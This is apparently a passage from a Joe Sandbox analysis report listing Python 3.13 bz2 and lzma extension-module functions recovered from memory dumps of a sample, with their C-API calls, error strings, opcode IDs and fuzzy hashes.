                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                                                                                                                                                                      • API String ID: 1563898963-3455802345
                                                                                                                                                                                                      • Opcode ID: 7038bb454f586ae4dad1402c0e0bde3884d53d6ff29d73da2e3d1cdb120589a6
                                                                                                                                                                                                      • Instruction ID: c204eae3fdf9d94cf4f98554142e31014329b1e50ceda09271b9d637ee08286f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7038bb454f586ae4dad1402c0e0bde3884d53d6ff29d73da2e3d1cdb120589a6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6310DA3A08B4281EA148B3DED44229A7A1FB44BA4F149231DB6F437B5EF7DE951C304
                                                                                                                                                                                                      Function 00007FFBBB615C6C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615CA4
                                                                                                                                                                                                      • PyBytes_FromStringAndSize.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D07
                                                                                                                                                                                                      • PyList_Append.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D1B
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D37
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6146E2,?,?,?,00000000,?,?,?,00007FFBBB608041), ref: 00007FFBBB615D50
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                                                                                                                                                                      • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                                                                                                                                                                      • API String ID: 1563898963-3455802345
                                                                                                                                                                                                      • Opcode ID: 49b1fd29c3d512e922a83069a7b3722a8aaa4f5746a719be75dd05b010d48014
                                                                                                                                                                                                      • Instruction ID: 5cd08040d29fa34f52fa6961c3d5df011772a44a165b68929bd1761ec31f9072
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b1fd29c3d512e922a83069a7b3722a8aaa4f5746a719be75dd05b010d48014
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3831C9A1A19B4681EA148F3DED44239F3A1FB44BA4F14A235DB6E477B4DF7DE8418308
                                                                                                                                                                                                      Function 00007FFBBB63222C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_KeywordsLong_ModuleModule_StateType_
                                                                                                                                                                                                      • String ID: BZ2Compressor
                                                                                                                                                                                                      • API String ID: 694278274-1096114097
                                                                                                                                                                                                      • Opcode ID: 0ee3de51229659852c1ac05442395534d45947c7dff83e6d88628dc9d0c49d04
                                                                                                                                                                                                      • Instruction ID: 153f65f4da8f50b26f3c5baebfa954a4d923f9d72ec12556dc9b1746d7d7fbd2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ee3de51229659852c1ac05442395534d45947c7dff83e6d88628dc9d0c49d04
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1021FFA3A08A4285EA549B7DDC84679A3A1FB84B84F488131DB4F477B5DF7CEC51C308
                                                                                                                                                                                                      Function 00007FFBBB6101AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Long$Arg_BufferBuffer_CheckErr_Long_Module_Object_OccurredPositionalReleaseStateUnsignedfreememset
                                                                                                                                                                                                      • String ID: _decode_filter_properties
                                                                                                                                                                                                      • API String ID: 2300122949-1472779162
                                                                                                                                                                                                      • Opcode ID: 04876776030b559b9c37cc04aba1f2f3309115b9832110f2900de013c6a2c948
                                                                                                                                                                                                      • Instruction ID: c5c0ab0347fc25f1720d8b580d9eb8a1d6e2dd03a722546105ef45c9f998b9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04876776030b559b9c37cc04aba1f2f3309115b9832110f2900de013c6a2c948
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF218EA1B04A4685EA148B3AE844679B3A0FB98F84F58D131DB0E43774DF3CED46C704
                                                                                                                                                                                                      Function 00007FFBBB6336DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lockmemcpy
                                                                                                                                                                                                      • String ID: End of stream already reached
                                                                                                                                                                                                      • API String ID: 180092378-3466344095
                                                                                                                                                                                                      • Opcode ID: db2bc4c0d48d41f655f77b3ca049332d247d461f9ed1c925fb763dcb2ce63ec9
                                                                                                                                                                                                      • Instruction ID: 268b573c548ee68d20ad2607b63135134e5830b1679c70a4d5895b646b1378b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: db2bc4c0d48d41f655f77b3ca049332d247d461f9ed1c925fb763dcb2ce63ec9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3011C6A6A08A4196EA149B2AED44169A764FB89FC4F188031DF5E43765CF3CEC51C308
                                                                                                                                                                                                      Function 00007FFBBB609600 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lock
                                                                                                                                                                                                      • String ID: Already at end of stream
                                                                                                                                                                                                      • API String ID: 2195683152-1334556646
                                                                                                                                                                                                      • Opcode ID: 23e90ce53a5e8f7f238537e387acf1ca73c925dc62d0e9b53aaa5db74a180178
                                                                                                                                                                                                      • Instruction ID: 6943722435b7d02ce9cafb4e6520cd66eda16f4c811df2ec711589f87f379ea0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e90ce53a5e8f7f238537e387acf1ca73c925dc62d0e9b53aaa5db74a180178
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C11DAA1A18A4185EA589B7AEC44179B765FB88FC4F499031DF0E43765CF3CE8568308
                                                                                                                                                                                                      Function 00007FFBBB6325FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lock
                                                                                                                                                                                                      • String ID: Compressor has been flushed
                                                                                                                                                                                                      • API String ID: 1906554297-3904734015
                                                                                                                                                                                                      • Opcode ID: 280152d272f57e6d95092040825aba02ee9c507a64f7b624af6d61e43dc0302a
                                                                                                                                                                                                      • Instruction ID: 27ecee6fa108e0e6196bbd9b894747664b87806ae84b24140ff3429cb4782075
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 280152d272f57e6d95092040825aba02ee9c507a64f7b624af6d61e43dc0302a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D411CBB2A08A5292EA10DB2EED54169A364FB89BC4B149432DF5F47B74CF3CEC91C744
                                                                                                                                                                                                      Function 00007FFBBB609020 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609046
                                                                                                                                                                                                      • PyThread_release_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB609078
                                                                                                                                                                                                      • PyErr_SetString.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6090A8
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB60857C: PyType_GetModuleState.PYTHON313 ref: 00007FFBBB6085B5
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB60857C: PyBytes_FromStringAndSize.PYTHON313 ref: 00007FFBBB6085C9
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB60857C: PyList_New.PYTHON313 ref: 00007FFBBB6085E0
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB60857C: PyEval_SaveThread.PYTHON313 ref: 00007FFBBB608631
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB60857C: PyEval_RestoreThread.PYTHON313 ref: 00007FFBBB60864B
                                                                                                                                                                                                      • PyEval_SaveThread.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148A2
                                                                                                                                                                                                      • PyThread_acquire_lock.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148B7
                                                                                                                                                                                                      • PyEval_RestoreThread.PYTHON313(?,?,?,00007FFBBB608551), ref: 00007FFBBB6148C0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
                                                                                                                                                                                                      • String ID: Compressor has been flushed
                                                                                                                                                                                                      • API String ID: 3871537485-3904734015
                                                                                                                                                                                                      • Opcode ID: 93de4d5cb0508ffd5a7dfeffd0af339d395ad221db97f1efa8aca5c53164853c
                                                                                                                                                                                                      • Instruction ID: 04e2c025984fcedcc7438d83ed1a9201d9deda5b2e05042e404eedd819cfd459
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93de4d5cb0508ffd5a7dfeffd0af339d395ad221db97f1efa8aca5c53164853c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE11AAA5A08A9281EB58CB2AEC44279B365FB88BC4F589035DF4F47B64CF3CD8568744
                                                                                                                                                                                                      Function 00007FFBBB63200C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_SizeThread_release_lock
                                                                                                                                                                                                      • String ID: Repeated call to flush()
                                                                                                                                                                                                      • API String ID: 3236580226-194442007
                                                                                                                                                                                                      • Opcode ID: 4754abb13fe3894e29a333388fa33b4ce1169a5a9ba9414d824f219d6c87b798
                                                                                                                                                                                                      • Instruction ID: 70e1ac97832c6f4194bd4b3c8a52a44a19c16def8a3b7787497689a028e51043
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4754abb13fe3894e29a333388fa33b4ce1169a5a9ba9414d824f219d6c87b798
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A11F8B2A08A4292EA109B2EE944679A261FB88B84F048031DF0F47A74CF2DE856C704
                                                                                                                                                                                                      Function 00007FFBBB612894 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Eval_Thread$RestoreSaveStringThread_acquire_lock$Bytes_Err_FromList_ModuleSizeStateThread_release_lockType_
                                                                                                                                                                                                      • String ID: Repeated call to flush()
                                                                                                                                                                                                      • API String ID: 3871537485-194442007
                                                                                                                                                                                                      • Opcode ID: 846ad34fc956f2d8cc9539ebd28b4008fa9c7d7d9fbee7c40b9c9ffed26adc9f
                                                                                                                                                                                                      • Instruction ID: ee734eb42d5355c8bed396eda328d075a52b31ff8c520109d412ff9c122846d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846ad34fc956f2d8cc9539ebd28b4008fa9c7d7d9fbee7c40b9c9ffed26adc9f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E21116A1A08A5282E7589B3AEC44379B355FB84B80F04D031DB0F47774CF2DE8558704
                                                                                                                                                                                                      Function 00007FFBBCD414BC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$AdjustPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1501936508-0
                                                                                                                                                                                                      • Opcode ID: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                      • Instruction ID: c49f71506ea875154692db7ad4ac15889588d8c2dd7cf7b8363c20368b8d99c1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77e56ffb7347bb9ddddd1c8b20b2eb7c3ebdd653f05e7e8cd9cc1452737c897
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC51B1E9F0E68281FE65CB7DD04E6B867A4AF44F80F098539CB5E06794DF2CE8418708
                                                                                                                                                                                                      Function 00007FFBBCD412D8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: abort$AdjustPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1501936508-0
                                                                                                                                                                                                      • Opcode ID: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
                                                                                                                                                                                                      • Instruction ID: 729cfe7deae3e1cd455653c97364a7b633b2ab5df8a6d0fdb2c35fd945276292
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f4cdc7b1f5bc10ab634606701f5204aa77954bebd3c90e9ebba0e05a3be14f8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC518FE9B0AA4281FE65DB3DD44E6787395AF44F84F0A8439CB4E06B95DF2CE841C309
                                                                                                                                                                                                      Function 00007FFBBB6081F0 Relevance: 12.1, APIs: 8, Instructions: 103COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_BufferBuffer_Err_IndexKeywordsLong_Number_Object_OccurredReleaseSsize_tUnpackmemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 606573005-0
                                                                                                                                                                                                      • Opcode ID: a324398e3bede2699f5ce2eec0847bfe6a28e1d246fcab0b9eaa74794024205a
                                                                                                                                                                                                      • Instruction ID: 005994924621d5555b661d515665c1c16f8fad66d391ef3dbeb59d44305e8f66
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a324398e3bede2699f5ce2eec0847bfe6a28e1d246fcab0b9eaa74794024205a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F541A5A1A08B4286EE54CF2AE880379B350FB58B90F84C130DF5E037A5EF3CD845C648
                                                                                                                                                                                                      Function 00007FFBBB633574 Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arg_BufferBuffer_IndexKeywordsLong_Number_Object_ReleaseSsize_tUnpackmemset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1047613875-0
                                                                                                                                                                                                      • Opcode ID: 50970edf94aab080e00a017c8fdbf5507f53e9c43653c6ce39d107284c02803c
                                                                                                                                                                                                      • Instruction ID: 004f7e4e262923104d603fcb40b5bb10113de0e7f1060546d1f92a025e6f18e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50970edf94aab080e00a017c8fdbf5507f53e9c43653c6ce39d107284c02803c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434183A3A19B5296EA119F2EEC44679A2A0FB49BD0F448131DF5E07BA4EF3CDC45C704
